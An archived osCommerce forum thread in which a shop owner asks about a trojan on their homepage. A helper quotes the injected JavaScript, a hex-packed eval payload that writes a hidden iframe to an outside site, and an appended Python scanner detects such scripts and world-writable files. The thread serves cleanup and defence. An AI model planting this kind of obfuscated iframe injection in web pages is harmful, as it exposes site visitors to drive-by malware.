osCommerce

Trojan - I think


joyces


Hi Everyone

I had a trojan on my index.html page a couple of weeks ago.

It was my own fault as I hadn't set the permissions correctly. My index page sits on the server in public_html and feeds into the catalog folder which also sits at the same level in public_html. Hope that makes sense.

 

I had set the permissions correctly for the catalog folder and as far as I could see the trojan was only on the index page. I took it down and put up a clean emergency stop-gap page (still there at the moment) and set the permission correctly and as far as I could see all was now ok.

I have had an e-mail from one of my reps to say that he gets a warning when he goes to my site:

"A known bad file was blocked from opening index[1].htm (exploit)"

I have tried visiting my site from a number of different computers, all with anti-virus, but don't get the warning.

Can anyone please have a look at this link and let me know if they get a warning, and can anyone tell me whether this means it is a trojan? Also, can anyone tell me how I find out which pages are affected?

http://www.kingsandqueens.org.uk/catalog/index.php?cPath=64_81

Thanks to anyone who can spare the time

Joyces


The index.html in the root of the site has a trojan javascript at the very end of the source.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 


Joyces,

This is the script that needs to be removed:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

 

 

 

Chris


Thank you both so much. Was so worried couldn't sleep, had to get up and check for replies.

I have removed the code.

When I was checking the permissions on index.html it had reverted back to 777 although I know I changed it to 644 after I re-read Spooks' great thread on how to secure your site.

I think I also read somewhere that some hosts/servers only work on file permissions of 777 and I think the advice was to "change hosts".

Unless anyone knows of an alternative explanation I will pursue that with them tomorrow and if it's true maybe I will then pursue them with a big stick!

Anyway thanks a lot

Joyces


Joyces,

Ensure you have removed ALL malicious code and anomalous files. Hackers often place backdoors on servers which give them unrestricted access to your hosting account.

Chris


Archived

This topic is now archived and is closed to further replies.
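
Added example, not part of the original thread: a Python scanner for the two things the thread turns on, a <script> that hides its payload as a hex string rebuilt with String.fromCharCode and eval, and files left world-writable (such as 777). It decodes the hex to text without running it and lists any iframe URL inside; the file-extension list, the placeholder host injected.example and the sample page are assumptions constructed for the example.

```python
import re
import sys
from pathlib import Path

# A quoted run of 40+ hex digits: how the injected script stores its payload.
HEX_LITERAL = re.compile(r"""["']((?:[0-9a-fA-F]{2}){20,})["']""")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_SRC = re.compile(r"""<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
WEB_EXTS = {".html", ".htm", ".php", ".js", ".tpl"}  # assumed set of served file types


def decode_hex_scripts(text):
    """Return [(decoded_js, iframe_urls)] for hex-packed <script> blocks; nothing is executed."""
    findings = []
    for block in SCRIPT_BLOCK.finditer(text):
        body = block.group(1)
        # Ignore scripts that neither rebuild a string nor evaluate one.
        if "fromCharCode" not in body and "eval" not in body:
            continue
        for lit in HEX_LITERAL.finditer(body):
            decoded = bytes.fromhex(lit.group(1)).decode("latin-1")
            findings.append((decoded, IFRAME_SRC.findall(decoded)))
    return findings


def scan_tree(root):
    """Report web files under root that carry a hex-packed script or are world-writable."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTS:
            continue
        hits = decode_hex_scripts(path.read_text(errors="replace"))
        mode = path.stat().st_mode & 0o777
        if hits or mode & 0o002:
            report[str(path)] = {"hits": hits, "mode": oct(mode),
                                 "world_writable": bool(mode & 0o002)}
    return report


# Constructed sample: a placeholder page with a hex-packed script appended at the end.
SAMPLE_JS = "document.write('<iframe src=\"http://injected.example/n.php\" width=\"1\" height=\"1\"></iframe>')"
SAMPLE_PAGE = ("<html><body>Shop</body></html>\n<script>var t=\"\";var arr=\""
               + SAMPLE_JS.encode().hex()
               + "\";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>")

if __name__ == "__main__":
    for name, info in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, info["mode"], [urls for _, urls in info["hits"]])
```

Run it against a downloaded copy of the site, passing the folder as the first argument. Files it does not flag can still hold other kinds of backdoor, so it narrows the search rather than clearing the site.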
